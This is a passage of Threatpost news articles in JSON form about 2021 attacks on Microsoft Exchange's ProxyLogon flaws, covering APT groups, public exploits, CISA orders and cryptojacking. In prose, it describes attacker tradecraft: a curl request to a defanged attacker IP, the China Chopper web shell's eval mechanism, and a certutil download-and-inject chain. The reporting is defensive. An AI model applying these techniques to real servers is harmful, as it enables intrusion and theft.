said they saw hundreds of exploit attempts against organizations worldwide \u2013 with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).\n\nResearchers warned that exploitation activity will continue \u2014 and urged companies that have not already done so to patch.\n\n\u201cSince the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,\u201d according to Check Point researchers. \u201cGlobal experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-12T16:26:07", "type": "threatpost", "title": "Microsoft Exchange Exploits Pave a Ransomware Path", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-12T16:26:07", "id": "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "href": "https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-11T21:58:44", "description": "Recently patched Microsoft Exchange vulnerabilities are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world. Overall exploitation activity is snowballing, according to researchers.\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. Four flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a webshell for further exploitation within the environment.\n\nAnd indeed, adversaries from the Chinese APT known as Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft was spurred to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) for the exploited bugs, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\n## **Rapidly Spreading Email Server Attacks**\n\nMicrosoft said last week that the attacks were \u201climited and targeted.\u201d But that\u2019s certainly no longer the case. Other security companies have [continued to say](<https://twitter.com/0xDUDE/status/1369302347617349642>) they have seen much broader, escalating activity with mass numbers of servers being scanned and attacked.\n\nESET researchers [had confirmed this](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as well, and on Wednesday announced that it had pinpointed at least 10 APTs going after the bugs, including Calypso, LuckyMouse, Tick and Winnti Group.\n\n\u201cOn Feb. 28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by LuckyMouse, Calypso and the Winnti Group,\u201d according to [the writeup](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>). \u201cThis suggests that multiple threat actors gained access to the details of the vulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by reverse-engineering Microsoft updates.\u201d\n\n> The [@DIVDnl](<https://twitter.com/DIVDnl?ref_src=twsrc%5Etfw>) scanned over 250K Exchange servers. Sent over 46k emails to the owners. The amount of vulnerable servers is going down. The number of compromised systems is going up. More organizations start investigating their systems for [#Hafnium](<https://twitter.com/hashtag/Hafnium?src=hash&ref_src=twsrc%5Etfw>) exploits.<https://t.co/XmQhHd7OA9>\n> \n> \u2014 Victor Gevers (@0xDUDE) [March 9, 2021](<https://twitter.com/0xDUDE/status/1369302347617349642?ref_src=twsrc%5Etfw>)\n\nThis activity was quickly followed by a raft of other groups, including CactusPete and Mikroceen \u201cscanning and compromising Exchange servers en masse,\u201d according to ESET.\n\n\u201cWe have already detected webshells on more than 5,000 email servers [in more than 115 countries] as of the time of writing, and according to public sources, [several important organizations](<https://twitter.com/sundhaug92/status/1369669037924483087>), such as the European Banking Authority, suffered from this attack,\u201d according to the ESET report.\n\nIt also appears that threat groups are piggybacking on each other\u2019s work. For instance, in some cases the webshells were dropped into Offline Address Book (OAB) configuration files, and they appeared to be accessed by more than one group.\n\n\u201cWe cannot discount the possibility that some threat actors might have hijacked the webshells dropped by other groups rather than directly using the exploit,\u201d said ESET researchers. \u201cOnce the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware through it. We also noticed in some cases that several threat actors were targeting the same organization.\u201d\n\n## **Zero-Day Activity Targeting Microsoft Exchange Bugs**\n\nESET has documented a raft of activity targeting the four vulnerabilities, including multiple zero-day compromises before Microsoft rolled patches out.\n\nFor instance, Tick, which has been infiltrating organizations primarily in Japan and South Korea since 2008, was seen compromising the webserver of an IT company based in East Asia two days before Microsoft released its patches for the Exchange flaws.\n\n\u201cWe then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group,\u201d ESET researchers said. \u201cIts main objective seems to be intellectual property and classified information theft.\u201d\n\n\n\nA timeline of ProxyLogon activity. Source: ESET.\n\nOne day before the patches were released, LuckyMouse (a.k.a. APT27 or Emissary Panda) compromised the email server of a governmental entity in the Middle East, ESET observed. The group is cyberespionage-focused and is known for breaching multiple government networks in Central Asia and the Middle East, along with transnational organizations like the International Civil Aviation Organization (ICAO) in 2016.\n\n\u201cLuckyMouse operators started by dropping the Nbtscan tool in C:\\programdata\\, then installed a variant of the ReGeorg webshell and issued a GET request to http://34.90.207[.]23/ip using curl,\u201d according to ESET\u2019s report. \u201cFinally, they attempted to install their SysUpdate (a.k.a. Soldier) modular backdoor.\u201d\n\nThat same day, still in the zero-day period, the Calypso spy group compromised the email servers of governmental entities in the Middle East and in South America. And in the following days, it targeted additional servers at governmental entities and private companies in Africa, Asia and Europe using the exploit.\n\n\u201cAs part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group (Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report),\u201d according to ESET. \u201cThese tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers).\u201d\n\nESET also observed the Winnti Group exploiting the bugs, a few hours before Microsoft released the patches. Winnti (a.k.a. APT41 or Barium, known for [high-profile supply-chain attacks against the video game and software industries](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>)) compromised the email servers of an oil company and a construction equipment company, both based in East Asia.\n\n\u201cThe attackers started by dropping webshells,\u201d according to ESET. \u201cAt one of the compromised victims we observed a [PlugX RAT](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) sample (also known as Korplug)\u2026at the second victim, we observed a loader that is highly similar to previous Winnti v.4 malware loaders\u2026used to decrypt an encrypted payload from disk and execute it. Additionally, we observed various Mimikatz and password dumping tools.\u201d\n\nAfter the patches rolled out and the vulnerabilities were publicly disclosed, [CactusPete (a.k.a. Tonto Team)](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>) compromised the email servers of an Eastern Europe-based procurement company and a cybersecurity consulting company, ESET noted. The attacks resulted in the ShadowPad loader being implanted, along with a variant of the Bisonal remote-access trojan (RAT).\n\nAnd, the Mikroceen APT group (a.k.a. Vicious Panda) compromised the Exchange server of a utility company in Central Asia, which is the region it mainly targets, a day after the patches were released.\n\n## **Unattributed Exploitation Activity**\n\nA cluster of pre-patch activity that ESET dubbed Websiic was also seen targeting seven email servers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a governmental body in Eastern Europe.\n\nESET also said it has seen a spate of unattributed [ShadowPad activity](<https://threatpost.com/ccleaner-attackers-intended-to-deploy-keylogger-in-third-stage/130358/>) resulting in the compromise of email servers at a software development company based in East Asia and a real estate company based in the Middle East. ShadowPad is a cyber-attack platform that criminals deploy in networks to gain remote control capabilities, keylogging functionality and data exfiltration.\n\nAnd, it saw another cluster of activity targeting around 650 servers, mostly in the Germany and other European countries, the U.K. and the United States. All of the latter attacks featured a first-stage webshell called RedirSuiteServerProxy, researchers said.\n\nAnd finally, on four email servers located in Asia and South America, webshells were used to install IIS backdoors after the patches came out, researchers said.\n\nThe groundswell of activity, particularly on the zero-day front, brings up the question of how knowledge of the vulnerabilities was spread between threat groups.\n\n\u201cOur ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release,\u201d ESET concluded. \u201cIt is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.\u201d\n\nOrganizations with on-premise Microsoft Exchange servers should patch as soon as possible, researchers noted \u2013 if it\u2019s not already too late.\n\n\u201cThe best mitigation advice for network defenders is to apply the relevant patches,\u201d said Joe Slowick, senior security researcher with DomainTools, in a [Wednesday post](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). \u201cHowever, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities \u2014 including attack surface reduction and active threat hunting \u2014 to counter existing intrusions.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n\n** **\n", "cvss3": {}, "published": "2021-03-11T18:01:16", "type": "threatpost", "title": "Microsoft Exchange Servers Face APT Attack Tsunami", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-11T18:01:16", "id": "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "href": "https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to the game when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the cat is officially out of the bag, meaning that less sophisticated cybercriminals can start to leverage the opportunity.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. \u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dorman of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at-risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its [post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub, ](<https://twitter.com/taviso/status/1370068702817783810>)which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. [pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which it used to create an exploit. The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nMAPP delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). \u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) tool to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and will also scan the server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify any existing compromises. Then, it will remediate those.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. For instance, the APT Hafnium first flagged by Hafnium is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. \u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. \u201cAll this is made available just from the one line of code running on the server.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-04T21:57:55", "description": "Hot on the heels of Microsoft\u2019s announcement about active cyber-espionage campaigns that are [exploiting four serious security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. government is mandating patching for the issues.\n\nThe news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have \u201cpersistent system access and control of an enterprise network.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,\u201d reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>). \u201cThis determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.\u201d\n\n## **Rapidly Spreading Exchange Server Attacks**\n\nEarlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).\n\nThe exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said \u2013 but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.\n\nResearchers at Huntress Labs for instance told Threatpost that its researchers have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection/recovery installed), and it expects this number to keep rising.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nMeanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTS besides Hafnium.\n\n\u201cAmong them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,\u201d it tweeted, adding that while most attacks are against targets in the U.S., \u201cwe\u2019ve seen attacks against servers in Europe, Asia and the Middle East.\u201d\n\n> Most targets are located in the US but we\u2019ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 3/5 [pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)\n> \n> \u2014 ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)\n\nThe vulnerabilities only exist in on-premise versions of Exchange Server, and don\u2019t affect Office 365 and virtual instances. Yet despite the move to the cloud, there are plenty of physical servers still in service, leaving a wide pool of targets.\n\n\u201cWith organizations migrating to Microsoft Office 365 en masse over the last few years, it\u2019s easy to forget that on-premises Exchange servers are still in service,\u201d Saryu Nayyar, CEO, Gurucul, said via email. \u201cSome organizations, notably in government, can\u2019t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.\u201d\n\n## **CISA Mandates Patching Exchange Servers**\n\nCISA is requiring federal agencies to take several steps in light of the spreading attacks.\n\nFirst, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.\n\nThe forensics step would include collecting \u201csystem memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.\u201d\n\nIf no indicators of compromise have been found, agencies must immediately patch, CISA added. And if agencies can\u2019t immediately patch, then they must take their Microsoft Exchange Servers offline.\n\nAll agencies have also been told to submit an initial report by Friday on their current situation.\n\n\u201c[This] highlights the increasing frequency of attacks orchestrated by nation states,\u201d said Steve Forbes, government cybersecurity expert at Nominet, via email. \u201cThe increasing role of government agencies in leading a coordinated response against attacks. CISA\u2019s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.\u201d\n", "cvss3": {}, "published": "2021-03-04T17:08:36", "type": "threatpost", "title": "CISA Orders Fed Agencies to Patch Exchange Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:08:36", "id": "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "href": "https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-15T12:28:24", "description": "Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.\n\nResearchers discovered the threat actors using Exchange servers compromised using the highly publicized exploit chain\u2014which suffered a [barrage of attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups to infect systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells\u2014to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.\n\n\u201cAn unknown attacker has been attempting to leverage what\u2019s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,\u201d Sophos principal researcher Andrew Brandt wrote in the report. \n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers were inspecting telemetry when they discovered what they deemed an \u201cunusual attack\u201d targeting the customer\u2019s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.\n\nResearchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they\u2019ve been attacked in this way.\n\n## **How It Works**\n\nThe attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server\u2019s Outlook Web Access logon path (/owa/auth), according to the report. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.\n\nThe first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.\n\nThe batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.\n\nThe executable in the attack appears to contain a modified version of a tool publicly available on Github called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its Github page as having the ability to \u201cmigrate any x64 exe to any x64 process\u201d with \u201cno administrator privileges required,\u201d according to the report.\n\nOnce the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. \u201cThe batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,\u201d Brandt wrote.\n\nResearchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.\n\n## **Exploit-Chain History**\n\nThe ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain is comprised of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).\n\nTogether the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAs previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines already had been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost 